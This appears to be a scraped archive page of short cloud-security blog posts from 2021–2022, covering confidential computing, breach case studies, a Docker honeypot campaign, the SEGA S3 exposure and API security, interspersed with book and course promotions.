Cloud Security Titles
Cloud Security Training
MicroMasters® Program in Cloud Computing
Full Stack Cloud Application Development
AWS – Getting Started with Cloud Security
Infosec books | InfoSec tools | InfoSec services
Dec 23 2022
Cloud Security Titles
Cloud Security Training
MicroMasters® Program in Cloud Computing
Full Stack Cloud Application Development
AWS – Getting Started with Cloud Security
Infosec books | InfoSec tools | InfoSec services
Nov 07 2022
Some of the biggest barriers to cloud adoption are security concerns: data loss or leakage, and the associated legal and regulatory concerns with storing and processing data off-premises.
In the last 18 months, 79% of companies have experienced at least one cloud data breach; even more alarmingly, 43% have reported 10 or more breaches in that time. Despite the clear advantages of cloud infrastructure, one of the main challenges that often gets overlooked is the need to: (1) trust that the infrastructure will be secure enough against threats and (2) that the chosen cloud provider won’t purposefully or inadvertently access the data processing on their infrastructure. When dealing with highly sensitive/confidential data (such as banking information or healthcare patient data), this becomes a major concern and a barrier to further cloud adoption.
Traditional approaches for protecting data have relied upon implementing access controls and policies and encrypting data at rest and in transit, but none are able to prevent the threat in its entirety because a fundamental challenge remains: keeping data encrypted when in use, while it is being processed. Confidential computing – projected to be a $54B market by 2026 – is emerging as a way to remove the need for trusting infrastructure and service providers by keeping data protected/encrypted even when in use.
Confidential computing technology uses hardware-based techniques to create isolated environments called enclaves (also known as Trusted Execution Environments or TEEs).
Code and data within enclaves are inaccessible by other applications, users, or processes colocated on the system. The enclave keeps the data encrypted even when in use – while in memory and during computation. With a secure enclave environment, multiple parties can collaborate on analytics and AI use cases without compromising the confidentiality of their individual data and exposing it to other parties.
According to a recent survey, using secure enclaves in the enterprise setting is attractive for implementing safeguards for the following scenarios:
If these scenarios apply to you and your business, but you’re unsure what you’ll need to know to get started, here are five questions to ask your CISO:
Confidential computing technology is now available on all major cloud providers. This obviates the need to procure and maintain specialized hardware yourselves. Even though confidential computing and secure enclaves are still in the “emerging technology bucket,” organizations can easily adopt confidential computing through cloud vendors and ISVs. The cloud providers see the benefit of secure enclaves and their future potential as a transformative technology, and so have bought in.
Some confidential computing technologies, such as Intel SGX, require application modifications before they can run within enclaves. Other technologies, such as Confidential VMs, provide more flexibility and can run unmodified applications.
But, from a security perspective, this has the downside of having to trust the entire software stack within the VM. So, depending on the use case and requirements, one technology may be preferable over the other. In addition, proper adoption of confidential computing requires orchestrating management of the other constituent technologies, such as remote attestation.
The enclave adoption process can be complex and engineering teams will have to take time to build these capabilities to get their applications up and running. While bandwidth may be tight at times, the ROI is worth it in the long run. A growing ISV ecosystem can also help in the seamless adoption of confidential computing for a rich variety of use cases.
Before data can be shared with other teams, organizations typically need to follow a cumbersome governance process to restrict access to sensitive data, eliminate data sets or mask specific data fields, and prevent any level of data sharing.
Integrating secure enclaves provides an opportunity for organizations to increase both productivity and security measures. Multiple data owners can individually encrypt their entire data (including PII), pool it together, and analyze the collective data set within enclaves. Done effectively, multi-party collaboration can drive faster business results by enabling new and higher-quality insights.
Implementing confidential computing workflows can be difficult to do directly without using existing tools and software. One needs to make sure that confidential data is protected throughout its lifecycle. This can have a variety of moving parts – from integrating with existing key management systems to managing secure enclave infrastructure, rewriting applications, deploying code securely and verifiably to the enclaves, and keeping confidential data encrypted in storage and in transit in/out of the enclaves. However, there is a rich emerging ISV ecosystem of software that alleviates the complexities of confidential computing for a rich variety of use cases, making it easy to use and adopt by non-experts.
The top CPU vendors all introduced secure enclave and confidential computing solutions in recent years. These were adopted by the leading cloud vendors, some of which now offer solutions based on the same underlying technology. Microsoft Azure and Google Cloud Platform, for example, offer solutions based on AMD’s SEV technology. As software solutions running on top of these cloud platforms evolve, application vendors will introduce cross-platform solutions powered by the common hardware layers.
Businesses considering adopting cloud technology can better do so with secure enclaves. By asking your CISO these five questions, businesses can move into the future, understand what implementing secure enclaves will look like, better secure their data, and create a more efficient analytics process.
This ongoing shift to the cloud will increase efficiency for companies and reduce human error – especially knowing 57% of businesses will move their workloads to the cloud before the end of the year. When secure enclaves are implemented properly, the crucial component of ensuring security is not sacrificed. All businesses working with data should consider integrating confidential computing into their models to allow for analytics and AI on encrypted data.
Secure Processors Part I: Background, Taxonomy for Secure Enclaves and Intel SGX Architecture
Aug 31 2022
While cloud breaches are going to happen, that doesn’t mean we can’t do anything about them. By better understanding cloud attacks, organizations can better prepare for them.
Cloud breaches are inevitable.
It’s the reality we live in. The last few years have demonstrated that breaches occur, no matter how much security organizations put in place. The increased complexity of organizations — where a single mistake or vulnerability can lead to a compromise — coupled with the increased motivation, sophistication, and dedication of attackers, means breaches are here to stay. At the same time, organizations are transitioning to the cloud, making attackers shift focus to rapidly increase their attacks on cloud environments.
While this means that cloud breaches are inevitable, that doesn’t mean we can’t do anything about them. By better understanding cloud attacks, organizations can better prepare for them. Then, hopefully, they can contain and respond to attacks faster, reducing their impact and averting a crisis.
This two-part series will explore real-world attacks that unravel, investigate, and share insights on practical ways organizations can respond to cloud attacks in today’s threat landscape.
In the last few years, software-as-a-service (SaaS) platforms have been replacing traditional enterprise applications, making it easier for organizations to adopt and manage them. Part of the value such platforms provide is the ability to integrate and expand rapidly, supporting the ever-growing demands of users for more functionality. Further enhancing their platforms, SaaS vendors are creating a marketplace to allow third-party providers to add functionality and integration for its users. These marketplaces, however, can introduce substantial third-party risk, as can be seen in the following scenario.
After a company was notified by GitHub of a potential risk, GitHub didn’t provide any specific indicators of unauthorized access. Instead, GitHub provided only a generic notice that DeepSource, one of the apps the company had previously been using on the marketplace, was breached, making it hard to understand whether the organization was affected or not. An initial review done by the company of its GitHub logs did not help, as it could not see any access to its code by DeepSource.
The reason for this was rather simple — and it is at the heart of how many SaaS marketplaces operate. A few months before the breach, one of the company’s developers tried out the DeepSource app, wherein the developer granted DeepSource access to the code under his username. When the attackers used DeepSource’s access to download the entire code repository, what appeared in the logs was a pull request under the name of a legitimate user. The only indicator that it was malicious was the identification of an irregular IP address, which eventually was tied to other known attacks.
At this point, it became clear that the entire code repository had been stolen, and a full-blown response was needed to contain and recover from the breach. As with most code leakage cases, the immediate concern was access to secrets (passwords/keys) in the code. While it is generally bad practice to have hardcoded secrets in code, it is still a common practice by many — and this case was no different. By identifying the relevant secrets in the code, the next steps of the attackers — which, as expected, started accessing some of the Amazon Web Services (AWS) infrastructure — was predicted. By quickly identifying them, the company was able to block access to all relevant resources, contain the breach, and recover before more damage could be done.
What if one could mine cryptocurrency at somebody else’s expense? This idea is at the heart of many cryptomining attacks we see today, where attackers take over cloud resources, then run cryptominers on them collecting cryptocurrency while the hacked organization pays the cloud compute bills for it.
In a recent incident, a company had identified unknown files on 18 AWS EC2 machines they were running in the cloud. Looking at the files, it became clear they had fallen victim to the ongoing TeamTNT Watchdog cryptomining campaign. It was initially unclear how the attackers managed to infect so many EC2 instances, but as the investigation unfolded, it became apparent that instead of targeting individual machines, the attackers targeted the Amazon Machine Image (AMI) template used to create each machine. During the creation of the original image, there was a short time where a service was misconfigured, allowing remote access. TeamTNT used automatic tools to scan the network, identify it, and immediately place the miners there, which then got duplicated to every new machine created.
This highlights another common attack pattern: implanting cryptominers in publicly available AMIs through the Amazon marketplace.
As demonstrated by these cases, cloud attacks are here to stay. They’re different from what we’re used to observing, so it’s time to better prepare for their arrival. Stay tuned for part two, where we will dive into cloud ransomware and how to avoid it.
Jul 27 2022
Alkira today announced it has integrated its cloud service for connecting multiple networks with firewalls from Fortinet.
Announced at the AWS re:Inforce event, the integration makes it possible to automate the configuration and deployment of Fortinet firewalls via the FortiManager platform using a control plane that integrates with the networking services provided by multiple cloud service providers.
Ahmed Datoo, chief marketing officer for Alkira, said the alliance with Fortinet is in addition to existing support for firewalls from Palo Alto Network.
Alkira is making a case for a control plane for cloud networking that integrates with the application programming interfaces (API) exposed by various cloud service providers. As a result, there is no need for an IT team to deploy agent software on each cloud service to integrate the Alkira service, noted Datoo.
As organizations increasingly deploy workloads across multiple clouds, managing and securing each of the networks that cloud service providers give them access to has become challenging. The Alkira platform is designed to provide a single pane of glass for configuring networking and security services spanning multiple clouds, said Datoo. Those organizations can either use the frameworks provided by vendors such as Fortinet to manage individual elements or use an instance of the open source Terraform tool to programmatically invoke services, he noted.
The challenge organizations face when using multiple clouds is that each one is typically managed in isolation. As a result, IT teams find themselves dedicating IT staff to mastering the various tools required to manage these platforms. Over time, however, the total cost of IT starts to rise as each cloud platform is added to the extended enterprise. Alkira reduces those costs by unifying the provisioning and management of multiple cloud networks, said Datoo. It’s up to each IT organization to decide which cloud platform to use to deploy the Alkira platform to accomplish that goal, he added.
The alliance between Alkira and Fortinet is only the latest example of the convergence of network and security operations. While cybersecurity teams are still needed to define security policies, much of the routine management of firewalls and other security platforms is now handled by network operations—in part, to make up for the chronic shortage of cybersecurity personnel. Network operations, meanwhile, are slowly being integrated with other IT operations workflows to enable organizations to programmatically manage entire IT environments without requiring as many dedicated network specialists.
In the meantime, the attack surface that security teams are being asked to secure continues to expand in the age of the cloud. The issue, of course, is that the size of most organizations’ security teams remains constrained. The only way to secure all those cloud environments at scale is to rethink the entire approach to security operations. In most cases, those approaches were defined in an era where most workloads were deployed on on-premises IT environments that, in comparison, were comparatively simple to secure.
#InfoSecTools and #InfoSectraining
Ask DISC an InfoSec & compliance related question
May 06 2022
The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API port 2375. The attacks are related to crypto miners and reverse shells on the vulnerable servers using base64-encoded commands in the cmdline, built to evade defense mechanisms. This article briefly discusses three types of attacks which we observed lately in our Docker honeypot.
The coinminer attack chain involves several shell scripts to drop malicious components via deployment of legitimate Docker images on the vulnerable servers (the servers exposed to Docker API).
The threat actors tried to run the Alpine Docker image with chroot command to gain full privileges on the vulnerable server host (a common misconfiguration). The attacker passed curl utility as an argument to the Alpine image which downloads and runs the malicious shell script (hash:
👇 Please Follow our LI page…
#InfoSecTools and #InfoSectraining
May 04 2022
Role Based Access Control in Cloud Computing: Role Based Access Control Using Policy Specification and Ontology on Clouds
Apr 12 2022
In this video for Help Net Security, Paul Calatayud, CISO at Aqua Security, talks about cloud native security and the problem with the lack of understanding of risks to this environment.
A recent survey of over 100 cloud professionals revealed that often businesses lead the charge in cloud, they see the opportunity, they move forward, but more and more critical compute finds its way into these cloud environments, and the security teams start to take notice. Often too late, though.
The survey shows that the awareness is starting to become a problem, and the risks are not fully understood. Organizations need to get ahead of these things. To be able to apply a good cloud native security strategy, understanding the risks is imperative.
Securing DevOps: Security in the Cloud
Feb 02 2022
Access Control Management in Cloud Environments
Jan 14 2022
The threats are constantly shifting, subject to trends in cryptocurrency use, geopolitics, the pandemic, and many other things; for this reason, a clear sense of the landscape is essential. Below, you’ll find a quick guide to some of the most pressing threats of the coming year.
For threat actors, there is a simple calculus at play – namely, what method of attack is a) easiest and b) most likely to yield the biggest return? And the answer, at this moment, is Linux-based cloud infrastructure, which makes up 80%+ of the total cloud infrastructure. With cloud adoption increasing because of the pandemic, this has the potential to be a massive problem.
In just the last few months, ransomware gangs like BlackMatter, HelloKitty, and REvil have been observed targeting Linux via ESXi servers with ELF encryptors. And we have recently seen the PYSA ransomware gang adding Linux support. Meanwhile, experts are identifying new and increasing complex Linux malware families, which adds to the already-mounting list of concerns. Working pre-emptively against these threats is more essential than ever.
Building a Future-Proof Cloud Infrastructure
Jan 08 2022
With great power comes great responsibility and CIOs (Chief Information Office) of an organization are no different. Technology is always changing, it is a very difficult job to keep up with the changes. CIOs are expected to be aware of and have a detailed understanding of major IT industry trends, new technologies, and IT best practices that could benefit the organization.
In the current scenario, cloud computing is dominating the market. So, what are the interesting cloud computing facts that every CIO is expected to be aware of in 2022? Did you know facts about cloud computing before landing here? Let’s discuss this in detail.
Table of Content
Introduction to Cloud Computing
Jan 03 2022
At the end of the year, gaming giant SEGA Europe inadvertently left users’ personal information publicly accessible on Amazon Web Services (AWS) S3 bucket, cybersecurity firm VPN Overview reported.
The unsecured S3 bucket contained multiple sets of AWS keys that could have allowed threat actors to access many of SEGA Europe’s cloud services along withMailChimp and Steam keys that allowed access to those services. in SEGA’s name.
“Researchers found compromised SNS notification queues and were able to run scripts and upload files on domains owned by SEGA Europe. Several popular SEGA websites and CDNs were affected.” reads the report published by VPN Overview.
The unsecured S3 bucket could potentially also grant access to user data, including information on hundreds of thousands of users of the Football Manager forums at community.sigames.com.
Below is the list of bugs in SEGA Europe’s Amazon cloud reported by the company:
FINDING | SEVERITY |
---|---|
Steam developer key | Moderate |
RSA keys | Serious |
PII and hashed passwords | Serious |
MailChimp API key | Critical |
Amazon Web Services credentials | Critical |
Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and CloudFormation
Dec 06 2021
Security and Privacy Preserving for IoT and 5G Networks: Techniques, Challenges, and New Directions
Related articles:
The Best & Worst States in America for Online Privacy
Wireless Wars: China’s Dangerous Domination of 5G
👇 Please Follow our LI page…
#InfoSecTools and #InfoSectraining
Nov 26 2021
Practical Cloud Security: A Guide for Secure Design and Deployment
MicroMasters® Program in Cloud Computing
Oct 15 2021
“Today’s hyper-targeted spear phishing attacks, coming at users from all digital channels, are simply not discernable to the human eye. Add to that the increasing number of attacks coming from legitimate infrastructure, and the reason phishing is the number one thing leading to disruptive ransomware attacks is obvious.”
Apps and browsers are used as humans connect with work, family, and friends. Cybercriminals are taking advantage of this by attacking outside of email and taking advantage of less protected channels like SMS text, social media, gaming, collaboration tools, and search apps.
Spear phishing and human hacking from legitimate infrastructure increased in August 2021, 12% (or 79,300) of all malicious URLs identified came from legitimate cloud infrastructure like including AWS, Azure, outlook.com, and sharepoint.com – enabling cybercriminals the opportunity to easily evade current detection technologies.
Sep 30 2021
Misconfigurations in software development environments and poor security hygiene in the supply chain can impact cloud infrastructure and offer opportunities for malicious actors to control unwitting victims’ software development processes.
These were the results of a report from Palo Alto Networks’ security specialist Unit 42, which conducted a red team exercise with a large SaaS provider.
Within three days, the company discovered critical software development flaws that could have exposed the organization to an attack similar to those perpetrated against SolarWinds and Kaseya.
If an attacker (like an APT) compromises third-party developers, it’s possible to infiltrate thousands of organizations’ cloud infrastructures, the report warned.
Matt Chiodi, CSO of public cloud at Palo Alto Networks, explained that supply chain flaws in the cloud are difficult to detect because of the massive number of building blocks that go into even a basic cloud-native application.
“Our researchers estimated that the typical cloud-native application is built upon hundreds of these packages,” he said. “Let’s call them ‘Legos.’ Each of these Legos that developers plug into their application carries a certain risk and can be a vector to another supply chain attack.”
The report highlights how vulnerabilities and misconfigurations can quickly snowball within the context of the cloud software supply chain, and called for organizations to “shift security left.”
“Shifting security left is about moving security as close to development as possible,” said Chiodi. “Historically, security and development teams have operated independently of each other.” He added that development teams like to move quickly and try new things and security is more often the opposite.
“The concept of ‘shift left’ attempts to not change developer behaviors, but rather equip them with processes and tools that work natively to secure their existing methods of developing software,” Chiodi said. “If security teams can equip development teams with processes and tools that work natively with development tools and measure regularly, they greatly reduce their risks of supply chain insecurity from cloud-native applications. This is a good first step.”
He pointed out the first wave of migrations to the cloud was marked by “lift and shift,” meaning that organizations simply took existing applications as-is and moved them to the cloud.
“When they did this, they could say the applications were running in the cloud, but the applications themselves were not cloud-native,” he said.
Sep 17 2021
IBM Security Services today published a report detailing a raft of issues pertaining to cloud security, including the fact that there are nearly 30,000 cloud accounts potentially for sale on dark web marketplaces.
The report is based on dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research.
The report found advertisements for tens of thousands of cloud accounts and resources for sale. Prices generally range from a few dollars to over $15,000 per account for access credentials depending on the amount of cloud resources that might be made accessible. On average, the price tag for cloud access rose an extra $1 for every $15 to $30 in credit the account held. Therefore, an account with $5,000 in available credit would be worth about $250, the report surmised.
In 71% of cases, threat actors offered access to cloud resources via the remote desktop protocol (RDP). X-Force Red found that 100% of their penetration tests into cloud environments in 2021 uncovered issues with either passwords or policy violations. Two-thirds of cloud breaches would likely have been prevented by more robust hardening of systems, such as properly implementing security policies and patching systems, the report noted.
More troubling still, IBM research indicates that vulnerabilities in cloud applications are growing, totaling more than 2,500 vulnerabilities for a 150% increase in the last five years. Almost half of the more than 2,500 disclosed vulnerabilities in cloud-deployed applications recorded to date were disclosed in the last 18 months.
The report also notes two-thirds of the incidents analyzed involved improperly configured application programming interfaces (APIs), mainly involving misconfigured API keys that allowed improper access. API credential exposure through public code repositories frequently resulted in access into cloud environments as well, the report noted.
API Security in Action
Sep 16 2021
This, paired with the “anything you can do, I can do better” mantra adopted by today’s nation-state threat actors, has left mission-critical information vulnerable to attack as it undergoes the great cloud migration.
These agile threat actors – without any red tape to stand in their way – have already adopted a cloud-centric mindset, oftentimes at the expense of our national security. Meanwhile, emerging technologies like artificial intelligence and machine learning that lend themselves to assisting defensive efforts are rendered useless unless the defense community focuses more time, energy and resources on becoming cloud-centric.
Ultimately, the issue of national security hangs in the balance, and the best way to ensure we stay ahead of the curve is by using the cloud to “digitally overmatch” our opponents and unlock the full potential of digital transformation.
Originally coined by the Army, the concept of “digital overmatch” stems from the idea that the respective branches of the military can easily overwhelm their opponents on the ground due to their superior resources. Now, in the era of cyber-enabled conflict, this concept can also be applied to the non-Defense space. Given that data is such a strategic asset, defenders must ensure they can outpace and outmaneuver adversaries by using data-driven technologies such as the cloud, and deliver on-demand resources across all domains whenever and wherever they’re needed.
Without commercial and government innovation in cloud-native technology, federal agencies and the military are unable to maximize the full potential of their modernization strategy.
Cloud Computing Security: Foundations and Challenges
Aug 30 2021
All AWS Level 1 MSSP Competency Partners provide at minimum the ten 24/7 security monitoring, protection, and remediation services as defined in the Level 1 Managed Security Services baseline. Those ten 24/7 services specifically are below.
Many of the Level 1 MSSP Competency Partners also provide additional security assessment and implementation professional services as well to assist customers in their AWS cloud journey.
Aug 18 2021
While Security Orchestration Automation and Response (SOAR) solutions help automate and structure these activities, the activities themselves require telemetry data that provide the breadcrumbs to help scope, identify and potentially remedy the situation. This takes increasing significance in the cloud for a few reasons:
When incidents occur, the ability to quickly size up the scope, impact and root cause of the incident is directly proportional to the availability of quality data, and its ability to be easily queried, analyzed, and dissected. As companies migrate to the cloud, logs have become the de-facto standard of gathering telemetry.
The challenges when relying almost exclusively on logs for telemetry
This book is designed for security and risk assessment professionals, DevOps engineers, penetration testers, cloud security engineers, and cloud software developers who are interested in learning practical approaches to cloud security. It covers practical strategies for assessing the security and privacy of your cloud infrastructure and applications and shows how to make your cloud infrastructure secure to combat threats, attacks, and prevent data breaches. The chapters are designed with a granular framework, starting with the security concepts, followed by hand-on assessment techniques based on real-world studies, and concluding with recommendations including best practices.
FEATURES:
Aug 06 2021
By 2022, API abuses will become the most frequent attack vector, predicts Gartner. We’re already witnessing new API exploits reach the headlines on a near-daily basis. Most infamous was the Equifax breach, an attack that exposed 147 million accounts in 2017. Since then, many more API breaches and major vulnerabilities have been detected at Experian, Geico, Facebook, Peleton and other organizations.
So, why are API attacks suddenly becoming so prevalent? Well, several factors are contributing to the rise in API exploits. As I’ve covered before, the use of RESTful web APIs is becoming more widespread through digital transformation initiatives and SaaS productization. And, the data these touchpoints transmit can carry a hefty price tag. Unfortunately, cybersecurity has not sufficiently progressed, making APIs ripe for the hacker’s picking.
I recently met with Roey Eliyahu, CEO of Salt Security, to better understand why more and more APIs hacks are making headlines. According to Eliyahu, a general lack of security awareness means these integration points are a low-effort, high-reward attack target. Establishing protection against zero-day threats means increasing the visibility of API holdings, testing for broken authorization and instigating ongoing monitoring of runtime environments.
Below, I’ll review the top factors contributing to the rise in API exploits. We’ll explore some of the top reasons why API attacks are increasing and consider how a zero-day protection mindset can mitigate common API vulnerabilities.
API Security in Action